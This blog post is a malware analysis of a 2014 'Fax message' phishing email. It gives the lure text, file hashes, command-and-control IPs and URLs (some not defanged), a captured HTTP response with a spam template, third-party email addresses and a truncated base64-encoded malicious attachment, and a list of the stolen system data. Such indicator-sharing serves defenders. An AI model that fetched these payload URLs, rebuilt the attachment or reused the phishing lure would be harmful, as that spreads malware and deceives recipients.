Virus contained in e-mail “Fax message “

Message looks like this:

Fax Message [Caller-ID: 1-407-454-1519]

hxxp://hans-juergen-urban.de/inbox/get_message.php

You have received a 3 page fax at Tue, 25 Nov 2014 13:48:11 +0000.

* The reference number for this fax is chd_did11-10520192747-10397814691-268.

View this fax using your PDF reader.
Thank you for using the MyFax service!

The link generates a randomly named zip file along the lines of “fax_message2511_pdf<random>.zip”

Contained within the zip is a file called “fax_message2511_pdf.exe” (VirusTotal Report / Malwr Report – SHA256 “46a09679ac0519a59590402fc5496f5ed5753fa713c1c8ae2f3958bd342542a5”).

Upon running it contacted 95.211.199.37 on port 37273 (a different port to the one malwr picked up on):

http://95.211.199.37:37273/2511uk3/W7VM1/0/61-SP1/0/ (reverse dns of “todeusm-1.data-xata.net” which seems to be a domain associated with a russian website)

inetnum: 95.211.192.0 – 95.211.199.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: http://www.leaseweb.com

It also then contacted

hxxp://faberomunicipal.com/images/3.pnk (VirusTotal report – SHA256 )

inetnum: 164.138.211.0 – 164.138.211.255
netname: CYBERNETICOS1
descr: cyberneticos set 4
country: ES
admin-c: DS10833-RIPE
tech-c: DS10833-RIPE

Which is probably the payload. It seems to be encrypted or compressed.

It then closed itself and didn’t seem to do anything until the machine was rebooted at which point it injected something into explorer.exe and also ran it’s own .exe with a random name (oCRKcjvfeAyUqGi.exe) in C:\Users\myuser\AppData\Local\ – This name seems to change on every boot.
VirusTotal Report / Malwr Report. SHA256 “c5181069961fbf7bba51323e9f7ed74288e8557e41d8c639f7bea94f8306da79”

Further communication from the .exe file is to:

https://46.4.61.148:1025/tUcG0
and
https://46.4.61.148:1025/tU.com=G0EDT

Rdns of “40434.maxided.com” hosted in Germany at notorious host Hetzner – sub / resold by maxided.com:

inetnum: 46.4.61.128 – 46.4.61.191
netname: HETZNER-RZ13
descr: Hetzner Online AG
descr: Datacenter 13
country: DE

The above URL seems to contain some sort of spam e-mail content and destination addresses:

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 25 Nov 2014 14:54:32 GMT
Content-Length: 14098
Connection: keep-alive

uoKO6WHblJvAtypeHblJvAsend_to_allHblJvAsubjectHblJvALook the document
HblJvAcontentHblJvA<html>
<head>
<meta http-equiv=”content-type” content=”text/html; charset=UTF-8″>
</head>
<body bgcolor=”#FFFFFF” text=”#000000″>
Please review attached document.<br>
</body>
</html>
HblJvAuoKO6WuoKO6WHblJvAtypeHblJvAadditional_emailsHblJvAemailHblJvAlloyd.low@aol.comHblJvAemailHblJvAlamsdlkfm@gmx.comHblJvAuoKO6WuoKO6WHblJvAtypeHblJvAmessage_attachHblJvAattach_typeHblJvAfile_dataHblJvAattach_nameHblJvAdoc_9412_pdf.zipHblJvAattach_data_base64HblJvAUEsDBBQDAAAIAOV5eUWK6j981CYAAABeAAAQAAAAZG9jXzk0MTJfcGRmLnNjcuxWeVhUVRS/A4gDMTAWT81QR8NcMno6bgTZ1XgoCQooIIqQioVPcYGZUlNBZgjwOm5IWalFqKHigliCoA4Msugj0FwyU9RcLuGCSi6Jvs4dKDX76vv6t67O3d699/zO72wEjFuObBFCdvCTZYTyUXPD6J9bIvycO+9xRrscqrrkK/yruoyJmRqvmRU38924ibGayRNnzJip00yaoonTz9BMnaHxG[……SNIP………]rYTe4nO4mhxtrhQ3CEGi0W1jtoG2hbaldr12i1ab+117Z4a/jUy1sxes3nNdjV71BxSS18rU+3stQvX/lo7c538dYrVKVdHdBzuqHc84QiO2evmrquu27TuwXqB9egR01zIOTXhAC4pillTsaXYVuwodhF7iH3EASL5n345fQdQSwECPwMUAwAACADleXlFiuo/fNQmAAAAXgAAEAAAAAAAAAAAACCApIEAAAAAZG9jXzk0MTJfcGRmLnNjclBLBQYAAAAAAQABAD4AAAACJwAAAAA=HblJvAuoKO6WuoKO6WHblJvAtypeHblJvAclient_connection_idHblJvAid_stringHblJvA5186996108432692204HblJvAuoKO6W

The injected process into explorer.exe has similar functionality to some previous malware I’ve seen.

Once again it talks SSL to a random IP to ex-filtrate information. The HTTPS host is 195.154.231.222 (rdns of “195-154-231-222.rev.poneytelecom.eu”.

inetnum: 195.154.128.0 – 195.154.255.255
netname: FR-ILIAD-ENTREPRISES-CUSTOMERS
descr: Iliad Entreprises Customers
country: FR

The SSL certificate was only generated 21/Nov/2014 – so a recently usurped or setup C&C host.

   2   False    + 0.610               True   0.470 s      GET     200     757       application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/5/cert/my.ip.address.redacted/                                                     
   3   False    + 1.141               True   0.470 s      GET     200     805       application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/0/Win_7_SP1_32bit/1067/my.ip.address.redacted/                                     
   4   False    + 1.719               True   0.736 s      GET     200     46.69 K   application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/5/httprdc/my.ip.address.redacted/                                                  
   5   False    + 0.000               True   2.408 s      GET     200     389       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/sroIXKxRXSRSDKjDmgQgDXPPUCgLkLa/my.ip.address.redacted/                          
   6   False    + 2.532               True   0.532 s      GET     200     3.50 K    application/octet-stream  https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/5/respparser/my.ip.address.redacted/                                               
   7   False    + 3.094               True   10.189 s     GET     200     154.31 K  application/x-tar         http://kneelerdesign.com.au/Scripts/omon.tar                                                                                                              
   8   False    + 3.125               True   0.470 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/14/NAT/Port%20restricted%20NAT/0/my.ip.address.redacted/                           
   9   False    + 3.125               True   0.501 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/14/user/myuser/0/my.ip.address.redacted/                                           
   10  False    + 3.657               True   0.469 s      GET     404     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/23/216827571/TiwMhgdcMlBrTLqwHOuRRyyFnkNoOXQ/my.ip.address.redacted/               
   11  False    + 8.172               True   1.704 s      POST    502     357       text/html                 https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/63/generalinfo/my.ip.address.redacted/                                             
   12  False    + 13.407              True   0.548 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/10/43/25692/3/my.ip.address.redacted/                                              
   16  False    + 14.391              True   0.860 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/NCiHHayeVLjidIEdGLqiUyuomCTAVVv/my.ip.address.redacted/                          
   17  False    + 210.313             False               GET                       (None)                    https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/                          
   18  False    + 255.313             False               GET                       (None)                    https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/                          
   19  False    + 315.313             True   0.720 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/BpAIQFuxTAkqTvFBmdPnEXOqYxMAmoU/my.ip.address.redacted/                          
   20  False    + 511.094             True   0.517 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/WQoyhHBjOLykIbliIhFkamhGwnCtPPE/my.ip.address.redacted/                          
   21  False    + 706.704             True   0.735 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/QQLmWiqsHoRrQJrmRcRsjLPUEhiIgjw/my.ip.address.redacted/                          
   24  False    + 902.579             True   0.579 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/SbFALtcryJkXIXtxNsfIxwGQVYOmkwd/my.ip.address.redacted/                          
   25  False    + 1098.235            True   0.876 s      GET     200     197       text/plain                https://195.154.231.222/2511uk3/W7VM1_W617601.E44EBCF9E2265EC01CF99BB9B88C7C48/1/JObdmQuvPWlEKTHYiGGrBKEbfhSGQFo/my.ip.address.redacted/                       

Then it continues to wait and send periodic messages to the C&C server.

There is also a cheeky request to http://kneelerdesign.com.au/Scripts/omon.tar – which seems to be another encrypted blob of data. (IP 113.52.128.4 – No reverse DNS.)

inetnum: 113.52.128.0 – 113.52.131.255
netname: HOSTCORP
descr: HostCorp Internet
country: AU
admin-c: HIna1-AP
tech-c: HIna1-AP

As before – it steals (among other information)….

-The CPU info of the computer
-The users accounts on the system
-The programs installed on the system
-The services on the system including driver services

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

2 Responses to Virus contained in e-mail “Fax message “

  1. Pingback: “Fax message#382675552 ” scam again.. | thecomputerperson

  2. Pingback: Email “Fax Message #6464552 ” junk. | thecomputerperson

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s